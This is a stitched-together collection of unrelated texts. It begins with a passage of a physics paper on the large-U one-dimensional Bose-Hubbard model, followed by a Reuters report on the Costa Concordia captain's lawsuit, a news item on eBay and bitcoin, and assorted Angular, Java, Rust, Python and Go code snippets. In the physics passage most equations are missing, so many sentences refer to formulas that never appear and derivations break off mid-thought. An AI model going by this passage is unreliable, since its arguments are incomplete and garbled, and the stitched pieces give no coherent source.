However, in the 1D U → ∞ limit, i.e., the hard-core-boson (HCB) case, where double or multiple occupying of a lattice site is prohibited, exact eigenstates of the model can be constructed easily . For finite U , as in a real system, states with double or multiple occupancies should be considered, and this construction is no longer valid. However, one might expect that, for the case of finite but large U , where the properties of the system are still dominated by single occupancies or close to that of the HCB case, there should exist some proper "treatments" which can simplify the discussion. In this paper, we will focus our discussion on the large-U limit and search for such treatments.
Another consideration of our discussion comes from perturbative studies of the model. In large-U limit, many previous perturbative studies have taken the on-site-U or potential-energy part of the Hamiltonian as an unperturbed one and viewed the hopping or kinetic part as a perturbation . These discussions generally can apply well only to some special cases, e.g., integer-filling cases. This is mainly due to the highly degenerate eigenstates of the potentialenergy part of the Hamiltonian, which lead to many difficulties in a perturbation calculation. Similar problem has also arisen in the discussion of Fermi-Hubbard model, where it has been found that a more appropriate treatment of the problem is to retake the unperturbed Hamiltonian by including kinetic terms which do not alter the number of doubly-occupied sites in a state . While for Bose-Hubbard model, to the best of our knowledge, similar treatments have not been employed yet. We hope our discussion can go a step further along this line. Actually, a new and simple perturbation treatment will be developed and directly applied to study the ground-state property at the end of our discussion.
II. REDUCED HAMILTONIAN AND SOLUTIONS
We consider an N -particle Bose-Hubbard model on an L-site 1D lattice (lattice constant a = 1), where c † i (c i ) is the creation (annihilation) operator of bosons at site i, with the periodic boundary condition c † L+1 = c † 1 (c L+1 = c 1 ); i, j denotes pairs of nearest-neighbor sites, i.e., j = i + 1 or i − 1, and t is the hopping integral. The on-site U is finite but very large, U t, as we has mentioned above. Here, we also take the restriction N ≤ L, as in the HCB case.
We first reduce the Hamiltonian into a form which is much easier to solve. As a proper starting point for treating the large on-site U beyond HCB approximation, we discuss within the subspace of states which permit each site to be occupied by no more than two bosons. Then, for our purpose, a site i can be empty, singly-or doubly-occupied, for which the state can be denoted by |0 i , |1 i or |2 i respectively, with the on-site constrain |0 i 0| + |1 i 1| + |2 i 2| = 1.
, as the creation (annihilation) operators of single-and double-occupancies respectively at site i. Obviously, we have Then, within the subspace of states we discuss, Replacing c † i 's and c i 's in Eq. (1) with these relations finally yields a reduced Hamiltonian where, similar to the case of Fermi-Hubbard model , we have split the Hamiltonian into two parts: the part H 0 which preserves the number of singly-or doubly-occupied sites in a state, and the part H I which would change these numbers.
Since only the large-U limit is concerned here, the properties of the system are mainly determined by H 0 , and H I can be viewed as a perturbation part.
A. Eigenstates and eigenvalues when neglecting HI
Let us first neglect the perturbation part H I , i.e., H ≈ H 0 now, which is much easier to solve but remains nontrivial. We will find that the eigenstates can be obtained exactly. Consider states with N 1 singly-occupied and N 2 doublyoccupied sites, i.e., the total number of bosons N = N 1 + 2N 2 . Apparently, both N 1 and N 2 are conserved by H 0 . The basis states of the system can be commonly written as |ϕ x,γ = , in which sites x 1 , x 2 , · · · , x N1 are singly-occupied and sites γ 1 , γ 2 , · · · , γ N2 are doubly-occupied. However, we find that, for our purpose, it is more convenient to rewrite the basis states in another equivalent way. Actually, we note that for each |ϕ x,γ , once the singly-occupied sites x 1 , x 2 , · · · , x N1 are known, the rest sites on the lattice can only be empty or doubly-occupied; that is, we only need further the arranging information of these empty and double-occupancy states at the rest sites, rather than their specific location information, to completely determine the state. Then, we can represent the basis states as where |x ≡ only contains single-occupancies, while |σ ≡ |σ 1 σ 2 · · · σ L−N1 is the sequence of empty and double-occupancy states on the lattice, with σ j = 0 or 2, denoting empty or double-occupancy respectively. An illustrating example for this form of basis states is shown in Fig. 1. The advantage of this new form of basis states is that it enables us to separately treat the single-occupancy part of the states. Actually, as far as the part |x is considered, the Jordan-Wigner transformation is applicable, which maps the operators b † i and b i to spinless-fermion creation and annihilation operators f † i and f i respectively : Here we can directly map the part |x in Eq. 
(3) to N 1 -particle basis states of spinless fermions |x ≡ , and further map |x, σ to tensor-product states of |x and |σ , which we can write as We can equivalently transform H 0 into the space of these states, which we can call the tensor-state space (TSS), noting that |x ⊗ σ and |x, σ have a one-to-one correspondence. For simplicity, we can set 1 ≤ x 1 < · · · < x N1 ≤ L. Since the numbers of singly-and doubly-occupied sites both are conserved as far as H 0 is considered, we can discuss in the subspace of states with fixed N 1 and N 2 . Then, the term i d † i d i in H 0 can be simply replaced by N 2 . To transform the remaining terms in H 0 into the TSS, we can use a procedure which is very similar to that in Refs. and .
Since terms such as b † in H 0 only transfer a single-occupancy state from site j to j + 1, without changing the sequence of empty and double-occupancy states on the lattice, that is, their action on a state |x, σ is equivalent to that of f † Singly occupied sites( ): 1, 4, 6, · · · Sequence of empty ( ) and double-occupancy ( ) states: FIG. 1: (Color online) An illustrating example for the notation in |x, σ : x1, x2, · · · are the coordinates of singly-occupied sites, and |σ1σ2 · · · is the sequence of empty and double-occupancy states along the lattice.
would transfer a single-occupancy state from site L to 1, and simultaneously transfer an empty or double-occupancy state originally at site 1 to site L. Then, if the original sequence of empty and double-occupancy states on the lattice is |σ 1 σ 2 · · · σ L−N1 , it would be changed to |σ 2 · · · σ L−N1 σ 1 . Hence, there would be a cyclic permutation of this sequence. Additionally, for the single-occupancy part, b † 1 and b L can be mapped to f † 1 and where P is the cyclic permutation operator of the sequence |σ and P −1 is its inverse, both with their action on the |σ part of the state, i.e., P |σ = |σ 2 · · · σ L−N1 σ 1 and Then, H 0 can be mapped to an equivalent Hamiltonian in the TSS as which is much easier to solve. From the discussion above, for any two states |x, σ and |x , σ , one can find the matrix-element relation x , σ |H 0 |x, σ = x ⊗ σ |H equ 0 |x ⊗ σ . It should be noted that, similar to the case in Fermi-Hubbard model, H equ 0 can also be obtained equivalently by defining a unitary transform operator T ≡ x,σ |x ⊗ σ x, σ|, which satisfies T −1 = T † and can transform a state |x, σ to its counterpart in the TSS: T |x, σ = |x ⊗ σ . Then, noting the matrix-element relation for any two states With T , we can represent the mapped form in the TSS for any operators in principle, say, for H I . To diagonalize H equ 0 , let us first introduce the eigenstates of P and P −1 , as that in Ref. . For any sequence configuration |σ s 1 = |σ s 1 σ s 2 · · · σ s L−N1 , we can introduce |σ s m+1 = P m |σ s 1 , where m = 1, 2, · · · , till some integer m s ≤ L − N 1 , for which |σ s ms+1 = |σ s 1 appears for the first time. Obviously, m s is directly related to the detailed form of |σ s 1 . These configurations form an m s -dimensional subspace of sequences, with which we can construct m s eigenstates of P and P −1 as follows, where k s = 2πm/m s , and m = 0, 1, 2, · · · , m s − 1. It can be verified that P |χ ks = e iks |χ ks and P −1 |χ ks = e −iks |χ ks . 
Then, the eigenstates of H equ 0 can be written as where |ϕ is the spinless-fermion part of the eigenfunction. We have where for convenience, we have introduced h or h † can be easily diagonalized by considering the case of one spinless fermion. The procedure is just a repeating of that in Ref. .
Then, it follows that η = e iq , with q = k s /L + (2n + 1)π/L for even N 1 and q = k s /L + 2nπ/L for old N 1 , where n = 0, 1, 2, · · · , L − 1; and it should be note that q ± 2π and q are equivalent wave vectors. The corresponding eigenstate Obviously, |Ω q is also the eigenstate of the whole part −t(h+h † ) in h f (k s ), with an eigenvalue q = −t(e iq +e −iq ) = −2t cos q. Then, we can and then Eq. (6) becomes from which, we can take |ϕ = |q ≡ f † q1 f † q2 · · · f † q N 1 |0 , where q 1 , q 2 , · · · , q N1 are any N 1 wave vectors which are different from each other. Then, for given N 2 , the eigenstate of H equ 0 can be finally written as |ψ N2;q,ks = |q ⊗ |χ ks , with the eigenvalue E N2;q,ks = N1 v=1 qv + U N 2 . It should be noted that for N 2 = 0 (the case without double-occupancies), |χ ks = |00 · · · 0 and k s = 0. Then, the wave functions take the form |ψ N2=0;q,0 = |q ⊗ |00 · · · 0 , which is completely determined by the spinless-fermion part, and our results are simply reduced to the HCB ones . Hence, our discussion can indeed be viewed as a direct extension of the HCB case by including double-occupancies. For later convenience, we abbreviate the notations of |ψ N2=0;q,0 and the corresponding E 0;q,0 by |ψ 0;q and E 0;q respectively.
The ground state, which we can denote by |ψ 0;q0 , can be obtained by requiring that E 0;q = N v=1 qv takes its minimum: (i) For odd N , the N wave vectors of spinless fermions in , yielding a total-wave-vector Q = 0. The ground-state energy 2 . (ii) While for even N , the N wave vectors of spinless fermions should respectively take the values ± π L , ± 3π L , · · · , ± (N −1)π L , yielding Q = 0 as well. The ground-state energy
B. Thermodynamics
Similar to the case of 1D Fermi-Hubbard model , we can also give a discussion of the thermodynamics of the system basing on the eigenstates obtained above. It is convenient to discuss with the grand-canonical partition function Z = N Tre −β(H equ 0 −µN ) , with β = 1 kBT , where µ, the chemical potential of bosons, has been introduced. The trace here can be calculated with the eigenstates |ψ N2;q,0 . Different from the open-boundary case of 1D Fermi-Hubbard model discussed in Refs. , one may think that the operators P and P −1 in H equ 0 , which are directly associated with the periodic-boundary conditions, would lead to trouble in our calculation. However, from Eq. (6) or (7), ψ N2;q,ks |H equ 0 |ψ N2;q,ks = ψ N2;q,ks |h f (k s )|ψ N2;q,ks , and then Z is reduced to where the new trace "tr" is only over eigenstates with the same N 1 , N 2 and k s . This trace depends on N 2 or k s via the dispersion q . Similar to the 1D Fermi-Hubbard case , we now focus on the thermodynamic limit, i.e., the limit L → ∞, N → ∞, for which, the wave-vector q, and hence the dispersion q , tends to be continuous. Then, " q " can be replaced by "(L/2π) 2π 0 dq", and the trace "tr" will become independent of k s or N 2 . The partition function is further reduced as The factor C N2 L−N1 is resulted from the sum over k s , which just gives the total number of sequence configurations |σ , for given N 1 and N 2 . Let Z 1 (N 1 ) = tre −β( q q f † q fq−µN1) , which is directly related to the partition function for a system of free spinless fermions, with µ playing the role of effective "chemical potential ". Obviously, in the thermodynamic limit, for a given µ, Z 1 (N 1 ) takes its dominated value at the most-probable particle number N 1 =N 1 , whereN 1 can be determined via the most-probable distribution of spinless fermions f 1 (q) = 1 e β( q −µ) +1 , Hence, similar to the discussion in Ref. , in the thermodynamic limit, we can only keep the terms with N 1 =N 1 in the sum in Eq. 
(9), with a negligible error just as that in replacing the grand-canonical partition function by a canonical one; where which actually is the canonical partition function forN 1 spinless fermions, and Noting that N 2 is the number of doubly-occupied sites in the system, one can find that Z 2 is equivalent to the grandcanonical partition function for a "system" of double-occupancies, which have a unique energy level U of (L −N 1 )-fold degeneracy (as the factor C N2 L−N1 indicates) and an effective chemical potential 2µ. The distribution function for such system of double-occupancies is f 2 = 1 e β(U −2µ) +1 . Eq. (10) indicates that in the thermodynamic limit, our system can be viewed as a combination of two independent subsystems as far as the thermodynamics is considered: one forN 1 spinless fermions and the other for doubleoccupancies.
Then, in the thermodynamic limit, the density of singly-occupied sites in the system, while the density of doubly-occupied sites, and the total particle density of bosons, Using Eqs. (11)−(13), for given particle density ρ, we can calculate µ self-consistently. As an illustration, we take U = 10t and show the variation of µ with 0 < ρ < 1 in Fig. 2(a) for several temperatures. One can find that, there is a gradual departure of the finite-temperature results of µ from the zero-temperature one, especially for particle densities ρ ∼ 0 or 1, reflecting the redistribution of bosons with the increase of temperature. We also show the temperaturedependence of the density of doubly-occupied sites ρ 2 in Fig. 2(b), from which we can find that, doubly-occupied sites mainly appear at high temperatures (k B T > t) and their density is small even at very high temperatures (k B T ∼ 10t), especially for low-ρ systems. Hence, we can predict that the effect of doubly-occupied sites on the thermodynamic properties of the system is notable only at high temperatures and high particle densities. We can further calculate other interesting thermodynamic quantities of the system in the thermodynamic limit, such as the internal energyĒ, entropy S and specific heat C V , The results are shown in Fig. 3. For comparison, we have also shown the results of the HCB case, which are obtained by keeping ρ 1 = ρ. We can find that, the results ofĒ, S and C V , all coincide respectively with the corresponding HCB ones at low temperatures (k B T t). However, at high temperatures (k B T > t), the departure from the HCB results is obvious, as expected, since doubly-occupied sites gradually appear in the system with the increase of temperature and have their effect on the thermodynamic properties of the system mainly at high temperatures.
C. Perturbation treatment of HI
The eigenstates and eigenvalues obtained above also enable us to further include H I to get higher-order approximations or corrections. Since we are most interested in the low-energy cases, especially the ground state, we will mainly discuss how the eigenstates without double-occupancies, i.e., |ψ 0;q , are corrected by H I .
To do this, one may perform a canonical transformation H s = e −iS He iS , with a properly-chosen operator S (see, e.g., Refs. ), to obtain an effective Hamiltonian by ignoring terms which are viewed as high-order ones. However, higher-order terms in the Hamiltonian may not only lead to higher-order corrections, but also can contribute low-order ones to, say, the eigenstates; and hence it is generally hard to see exactly that to what extent the eigenvalues and eigenstates of the model have been approximated when using such treatment.
Here we want to develop a perturbation treatment, which, as we will see, is a little different from the usual textbook ones, to study the correction caused by H I . For simplicity, we can first introduce the equivalent operator of H I in the TSS: H equ I = T H I T † . For any two basis states |x, σ and |x , σ , we have x , σ |H I |x, σ = x ⊗ σ |H equ I |x ⊗ σ . Obviously, H equ I |ψ 0;q generates states with N 2 = 1 ( i.e., with one doubly-occupied site). To make the discussion not too cumbersome, we will only consider here the correction to a non-degenerate |ψ 0;q , say, the ground state. We can denote the corrected state by |ψ c 0;q and expand it with the non-corrected eigenstates, |ψ c 0;q = q a 0;q |ψ 0;q + N2;q ,ks a N2;q ,ks |ψ N2;q ,ks .
For simplicity, we can write E N2;q ,ks = E 0 N2;q ,ks + N 2 U , where E 0 N2;q ,ks = E N2;q ,ks − N 2 U obviously is independent of U , and then Eq.
Substituting Eqs. (15), (16) and (17) into Eqs. (18) and (20), and noting that matrix elements such as ψ 0;q |H equ I |ψ 1;q ,ks and ψ N2;q ,ks |H equ I |ψ N 2 ;q ,k s all are independent of U , we collect terms of the same order in 1/U to obtain: (i) The zeroth-order terms in 1/U , 1;q ,ks ψ 0;q |H equ I |ψ 1;q ,ks , N2;q ,ks = 0, from which, we see again that a (0) N2;q ,ks = 0, a 0;q = δ q ,q and E (0) 0;q = E 0;q . (ii) The first-order terms in 1/U , 1;q ,ks ψ 0;q |H equ I |ψ 1;q ,ks , N2;q ,ks = δ N2,1 ψ 1;q ,ks |H equ I |ψ 0;q , from which, we have a 1;q ,ks = ψ 1;q ,ks |H equ N2>1;q ,ks = 0, E While due to the requirement of a normalized |ψ c 0;q , a 0;q can be proved to be a pure imaginary number and can be absorbed as a negligible phase factor of |ψ 0;q , which is similar to the case in a usual non-degenerate perturbation theory (See, for example, Ref. ). Hence, we can neglect a (1) 0;q here. The results obtained so far can be summarized as follows: This procedure can continue further to give the detailed form for higher-order terms in principle, but it becomes more and more complicated.
In practical calculations, we always need matrix elements of (H equ I ) 2 between states without double-occupancies, as that in Eqs. (21) and (22), which we can calculate as follows: wheren b i ≡ b † i b i , and the last two steps follow through the relation d i d † i = b i b † i and the Jordan-Wigner transformation respectively.
We can take the ground-state correction as an example. Consider the odd-N case (the even-N case can be discussed similarly), of which the non-corrected ground-state result has been discussed in Sec. II A.
According to Eqs. (22) and (23), the correction to ground-state energy to first order in 1/U can be calculated as ∆E 0;q0 = 1 U ψ 0;q0 |(H equ I ) 2 |ψ 0;q0 + O( One can find that ∆E 0;q0 ∼ 4N 2 t 2 U L = 4N ρt 2 U and the average correction per particle ∆E 0;q0 /N ∼ 4ρt 2 U , which can be ignored for large U . The correction for other non-degenerate |ψ 0;q can also be calculated similarly, but with much more complexity, due to the complicated form of Eq. (23). The direct extension of our procedure to the case of degenerate |ψ 0;q can also be discussed, although it is too lengthy to be presented here.
III. CONCLUSION
In conclusion, our study of the 1D Bose-Hubbard model in the large-U limit is a direct extension of the HCB approximation by including doubly-occupied states. The main part of our reduced Hamiltonian, H 0 , which preserves the number of singly- or doubly-occupied sites in a state, enables us to solve it exactly in the TSS we introduced. With the obtained eigenstates and eigenvalues, we have calculated the thermodynamic properties of the system. Our results show that double-occupancies mainly appear and affect the properties of the system at high temperatures.
We think our treatment can capture the main physics of our large-U system. Even though, a new perturbation treatment has also been developed to discuss the corrections caused by the H I part, which indeed can be ignored as far as the ground state is considered. More further discussions, including the extension of our study to other 1D and quasi-1D Bose systems with large on-site U , will be given in future studies. |
Francesco Schettino walks in his hometown of Meta di Sorrento near Naples, October 11, 2012. The captain of the Costa Concordia which ran into a rock and capsized off the Italian coast in January, killing up to 32 people, has sued for wrongful dismissal, his lawyer said on Wednesday. Schettino faces charges of multiple manslaughter and abandoning ship and preliminary hearings will begin on October 15. REUTERS/Ciro de Luca
ROME (Reuters) - The captain of the Costa Concordia which ran into a rock and capsized off the Italian coast in January, killing up to 32 people, has sued for wrongful dismissal, his lawyer said on Wednesday.
Italian Francesco Schettino was not only fired by Costa Cruises but is accused by prosecutors of causing the accident by sailing the luxury cruise liner too close to shore.
He faces charges of multiple manslaughter and abandoning ship and preliminary hearings will begin on October 15.
“It is the right of every worker to appeal against his dismissal and Captain Schettino has done no more than exercise that right,” lawyer Bruno Leporatti said.
“There is nothing to contest or be amazed about, unless we want to say that what the law allows for all citizens doesn’t apply for Francesco Schettino.”
Schettino was held up to ridicule in Italy and abroad following the January 13 disaster off the Tuscan island of Giglio and his name became a symbol of incompetence and cowardice.
The angry order to “Get back on board, damn it!” delivered by a coast guard officer to Schettino over the telephone after he had abandoned his ship was printed on T-shirts in Italy.
Investigators said Schettino brought the 290-m (950-ft)-long vessel too close to shore, delayed evacuation and lost control of the operation during which he left the sinking ship while many of the 4,200 passengers and crew were still on board.
The Naples-born captain has always acknowledged making mistakes once it became clear that the 144,400-tonne Costa Concordia was in trouble, but has said he was not the only one who should be blamed for the tragedy. |
def custom(expr):
    """Build a :class:`CalculatedField` wrapping the given expression *expr*."""
    return CalculatedField(expr)
import {Inject, Injectable} from '@angular/core';
import {DOCUMENT} from "@angular/common";
@Injectable({
  providedIn: 'root'
})
export class LocalStorageService {
  /** Backing browser storage, obtained through the injected document. */
  private storage: Storage;

  constructor(@Inject(DOCUMENT) doc: Document) {
    // defaultView is the window that owns the document; it may be absent in
    // non-browser environments, hence the cast.
    this.storage = doc.defaultView?.localStorage as Storage;
  }

  /** Persist a value under the given key. */
  public setItem = (key: string, value: any): void => {
    this.storage.setItem(key, value);
  };

  /** Read the value stored under the given key. */
  public getItem = (key: string): any => {
    return this.storage.getItem(key);
  };

  /** Delete the entry stored under the given key. */
  public removeItem = (key: string): void => {
    this.storage.removeItem(key);
  };

  /** Read the entry under the given key, then delete it. */
  public getAndRemove = (key: string): any => {
    const value = this.getItem(key);
    this.removeItem(key);
    return value;
  };
}
|
def backward_autocomplete(self):
    """Step the autocomplete cycle backwards by one entry.

    Refreshes the buffer, surfaces a hint for the newly selected entry
    (when there is one) and reports whether a completion cycle is active.
    """
    idx = self.autocomplete_manager.autocomplete(action=-1)
    in_cycle = self.autocomplete_manager.is_in_cycle()
    self.update_buffer(clear=True)
    if idx is not None:
        self.ask_for_hint(idx, type="info")
    return in_cycle
// SetFlusher sets the flush strategy for the logger.
func (l *Logger) SetFlusher(f Flusher) {
l.mu.Lock()
defer l.mu.Unlock()
l.flusher = f
} |
EBay chief John Donahoe says he sees bitcoin and other digital currencies playing an "important role" in PayPal, the e-commerce giant's Internet payment platform.
"We're going to have to integrate digital currencies in our wallet," Donahoe said in an interview on CNBC's "Squawk Box."
While refusing to say when, the eBay CEO talked broadly about the advantages of bitcoin and why he owns some. "I'm not buying it as an investment. I'm buying it to understand how it can be used."
"I think there are two sides of it, the investment side and the digital currency side," he continued in the interview, which aired Thursday. "I'm more interested in the digital currency side about how you and I can exchange value seamlessly using technology."
Read more: 3 reasons Wall Street can't stay away from bitcoin
package daily;
/**
* description 字符串模式匹配
*
* 示例:
* 模式pattern:aabba (a、b组合成的字符串)
* 字符串:dogdogcatcatdog
* 结果:true
*
* @author chengwj
* @version 1.0
* @date 2020/6/22
**/
public class Leet {
public static void main(String[] args) {
//true
boolean b = new Leet().patternMatching("aabba", "dogdogcatcatdog");
boolean b2 = new Leet().patternMatching("aaaa", "dogdogdogdog");
boolean b3 = new Leet().patternMatching("", "");
boolean b4 = new Leet().patternMatching("a", "");
//false
boolean b5 = new Leet().patternMatching("ab", "");
boolean b6 = new Leet().patternMatching("bbbaa", "xxxxxxy");
}
public boolean patternMatching(String pattern, String value) {
if(pattern == null || value == null) {
return false;
}
int numOfA = 0, numOfB = 0;
for(int i = 0; i < pattern.length(); i++) {
if(pattern.charAt(i) == 'a') {
numOfA++;
continue;
}
if(pattern.charAt(i) == 'b') {
numOfB++;
continue;
}
}
int length = value.length();
boolean isAMore = numOfA > numOfB;
int max = numOfA + numOfB == 0 ? 0 : length / Math.max(numOfA, numOfB);
outer:
for(int i = 0; i <= max; i++) {
int lengthOfA,lengthOfB;
if(isAMore) {
lengthOfA = i;
lengthOfB = numOfB == 0 ? 0 : (length - lengthOfA * numOfA) / numOfB;
} else {
lengthOfB = i;
lengthOfA = numOfA == 0 ? 0 : (length - lengthOfB * numOfB) / numOfA;
}
if(lengthOfA * numOfA + lengthOfB * numOfB != length) {
continue;
}
//开始匹配
int beginOfA = Math.max(pattern.indexOf('a') * lengthOfB, 0);
int beginOfB = Math.max(pattern.indexOf('b') * lengthOfA, 0);
String a = value.substring(beginOfA, beginOfA + lengthOfA);
String b = value.substring(beginOfB, beginOfB + lengthOfB);
if(numOfA != 0 && numOfB != 0 && a.equals(b)) {
return false;
}
int index = 0;
for(int j = 0; j < pattern.length(); j++) {
if(pattern.charAt(j) == 'a') {
if(match(value,index,lengthOfA,a)) {
index += lengthOfA;
continue;
}
continue outer;
}
if(pattern.charAt(j) == 'b') {
if(match(value,index,lengthOfB,b)) {
index += lengthOfB;
continue;
}
continue outer;
}
}
return true;
}
return false;
}
private boolean match(String s, int index, int lengthOfD, String d) {
if(index + lengthOfD > s.length() || lengthOfD > d.length()) {
return false;
}
for(int i = 0; i < lengthOfD; i++) {
if(s.charAt(index + i) != d.charAt(i)) {
return false;
}
}
return true;
}
}
|
/// Factorial
///
/// Computes `n!`, with the usual convention `0! == 1`.
///
/// # Type
/// : `usize -> usize`
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(factorial(5), 120);
/// ```
pub fn factorial(n: usize) -> usize {
    // The product over an empty range (n == 0) is 1, matching 0! == 1.
    (1..=n).product()
}
/// Double Factorial
///
/// Computes `n!! = n * (n - 2) * (n - 4) * ...`, with `0!! == 1!! == 1`.
///
/// # Type
/// : `usize -> usize`
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(double_factorial(7), 105);
/// ```
pub fn double_factorial(n: usize) -> usize {
    // Walk n, n-2, n-4, ... down to 1 or 2; the empty product is 1.
    (1..=n).rev().step_by(2).product()
}
/// Permutation
///
/// Number of ordered arrangements, `nPr = n * (n - 1) * ... * (n - r + 1)`.
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(P(5,3), 60);
/// ```
#[allow(non_snake_case)]
pub fn P(n: usize, r: usize) -> usize {
    // Falling factorial: multiply the r terms n, n-1, ..., n-r+1.
    // r == 0 gives the empty product, 1.
    (0..r).map(|k| n - k).product()
}
/// Combination
///
/// Binomial coefficient `nCr`. Uses the symmetry `C(n, r) == C(n, n - r)`
/// and a multiplicative scheme whose intermediate products stay close to
/// the final result, avoiding the overflow that computing the full
/// `P(n, r) / r!` can hit for larger `n`.
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(C(10, 9), 10);
/// ```
#[allow(non_snake_case)]
pub fn C(n: usize, r: usize) -> usize {
    // Work with the smaller of r and n - r.
    let r = if r > n / 2 { n - r } else { r };
    let mut c = 1usize;
    for i in 1..=r {
        // Invariant: after this step c == C(n - r + i, i). The division is
        // exact because i consecutive integers always contain the factors
        // of i!.
        c = c * (n - r + i) / i;
    }
    c
}
/// Combination with Repetition
///
/// Multiset coefficient: the number of ways to pick `r` items from `n`
/// kinds with repetition allowed ("stars and bars"), i.e. `C(n + r - 1, r)`.
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(H(5,3), C(7,3));
/// ```
#[allow(non_snake_case)]
pub fn H(n: usize, r: usize) -> usize {
    // NOTE(review): n == 0 && r == 0 underflows n + r - 1 on usize;
    // callers are assumed to pass n >= 1 -- confirm.
    C(n + r - 1, r)
}
|
class AnalyzeMixin:
    """Mixin for processing files caught by the pylinac watcher.

    Attributes
    ----------
    obj : class
        The class that analyzes the file; e.g. Starshot, PicketFence, etc.
    config_name : str
        The string that references the class in the YAML config file.
    """
    obj = object  # analysis class; overridden by concrete subclasses
    config_name = ''  # key of this analysis type in the YAML config
    has_classification = False  # presumably: whether a classifier exists for this type -- TODO confirm

    def __init__(self, path, config):
        """
        Parameters
        ----------
        path : str
            The path to the file to be analyzed.
        config :
            The configuration settings of analysis. See `~pylinac.watcher.load_config`.
        """
        self.full_path = path
        self.local_path = osp.basename(path)
        self.base_name = osp.splitext(self.full_path)[0]
        self.config = config

    @classmethod
    def run(cls, files, config, skip_list):
        """Analyze every not-yet-processed file matching this analysis type.

        A file qualifies when its name contains one of the configured
        keywords, or (when ``use-classifier`` is set) the classifier matches
        it. Processed files are appended to ``skip_list`` so they are not
        analyzed again.
        """
        files = drop_skips(files, skip_list)
        for file in files:
            cond1 = contains_keywords(file, config, cls.config_name)
            if config[cls.config_name]['use-classifier']:
                cond2 = matches_classifier(file, cls)
            else:
                cond2 = False
            if cond1 or cond2:
                obj = cls(file, config)
                obj.process()
                skip_list.append(osp.basename(file))

    def process(self):
        """Process the file; includes analysis, saving results to file, and sending emails."""
        logger.info(self.full_path + " will be analyzed...")
        self.instance = self.obj(self.full_path, **self.constructor_kwargs)
        self.analyze()
        # Email on every analysis, or only on failures, depending on config.
        if self.config['email']['enable-all']:
            self.send_email()
        elif self.config['email']['enable-failure'] and self.should_send_failure_email():
            self.send_email()
        self.publish_pdf()
        # self.save_zip()
        logger.info("Finished analysis on " + self.local_path)

    def save_zip(self):
        """Archive the original file into a compressed ZIP and delete it.

        NOTE(review): currently disabled (see the commented-out call in
        ``process``); despite the comment below, only the source file --
        not the results -- is written into the archive.
        """
        # save results and original file to a compressed ZIP archive
        with zipfile.ZipFile(self.zip_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zfile:
            zfile.write(self.full_path, arcname=osp.basename(self.full_path))
        # remove the original files
        os.remove(self.full_path)

    @property
    def constructor_kwargs(self):
        """Any keyword arguments meant to be given to the constructor call."""
        return {}

    @property
    def zip_filename(self):
        """The name of the file for the ZIP archive."""
        return self.base_name + self.config['general']['file-suffix'] + '.zip'

    @property
    def pdf_filename(self):
        """The name of the file for the PDF results."""
        return self.base_name + '.pdf'

    @property
    def keywords(self):
        """The keywords that signal a file is of a certain analysis type."""
        return self.config[self.config_name]['keywords']

    def keyword_in_here(self):
        """Determine whether a keyword exists in the filename."""
        return any(keyword in self.local_path.lower() for keyword in self.keywords)

    @property
    def failure_settings(self):
        """The YAML failure settings."""
        return self.config[self.config_name]['failure']

    @property
    def analysis_settings(self):
        """The YAML analysis settings."""
        return self.config[self.config_name]['analysis']

    def send_email(self, name=None, attachments=None):
        """Send an email with the analysis results.

        Parameters
        ----------
        name : str, optional
            Label used in the message body; defaults to the file name.
        attachments : list or '', optional
            Files to attach. Defaults to the PDF report; '' means none.
        """
        if name is None:
            name = self.local_path
        if attachments is None:
            attachments = [self.pdf_filename]
        elif attachments == '':
            attachments = []
        # compose message
        current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        if self.config['email']['enable-all']:
            statement = 'The pylinac watcher analyzed the file named or containing "{}" at {}. '
            statement += 'The analysis results are in the folder "{}".'
        elif self.config['email']['enable-failure']:
            statement = 'The pylinac watcher analyzed the file named or containing "{}" at {} and '
            statement += 'found something that failed your configuration settings.'
            # NOTE(review): no space between the sentence above and the one
            # below; the sent message reads "...settings.The analysis..." --
            # confirm whether that is intended.
            statement += 'The analysis results are in the folder "{}".'
        statement = statement.format(name, current_time, osp.dirname(self.full_path))
        # send the email
        contents = [statement] + attachments
        recipients = [recipient for recipient in self.config['email']['recipients']]
        yagserver = yagmail.SMTP(self.config['email']['sender'], self.config['email']['sender-password'])
        yagserver.send(to=recipients,
                       subject=self.config['email']['subject'],
                       contents=contents)
        logger.info("An email was sent to the recipients with the results")

    def publish_pdf(self):
        """Write the analysis results to a PDF next to the original file."""
        self.instance.publish_pdf(self.pdf_filename, unit=self.config['general']['unit'])

    def should_send_failure_email(self):
        """Check whether analysis results were poor and an email should be triggered."""
        return not self.instance.passed

    def analyze(self):
        """Analyze the file."""
        self.instance.analyze(**self.analysis_settings)
/**
Gets the root module without checking that the layout of `M` is the expected one.
This is effectively a transmute.

This is useful if a user keeps a cache of which dynamic libraries
have been checked for layout compatibility.

# Safety

The caller must ensure that `M` has the expected layout.

# Errors

This function can return a `RootModuleError`
because the root module failed to initialize.
*/
pub unsafe fn unchecked_layout<M>(&self)->Result<M, RootModuleError>
where
    M: PrefixRefTrait,
{
    // Lazily run the library's root-module constructor (at most once).
    self.module.try_init(|| (self.constructor.0)().into_result() )
        .map_err(|mut err|{
            // Making sure that the error doesn't contain references into
            // the unloaded library.
            err.reallocate();
            err
        })?
        // Reinterpret the initialized prefix as `M`'s prefix fields; this is
        // the layout-trusting "transmute" the caller vouches for.
        .cast::<M::PrefixFields>()
        .piped(M::from_prefix_ref)
        .piped(Ok)
}
def ensure_a_list(data: Any) -> Union[List[int], List[str]]:
    """Normalize *data* into a plain list.

    Falsy input (None, '', 0, empty containers) yields an empty list;
    list/tuple/set inputs are converted with ``list``; a string is split
    via ``trimmed_split``; any other scalar is wrapped in a one-element
    list.
    """
    if not data:
        return []
    if isinstance(data, (list, tuple, set)):
        return list(data)
    if isinstance(data, str):
        # Delegate tokenizing of a raw string to the project's splitter.
        return trimmed_split(data)
    return [data]
<filename>test/interactive/command_test.go
/*
Copyright 2020 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
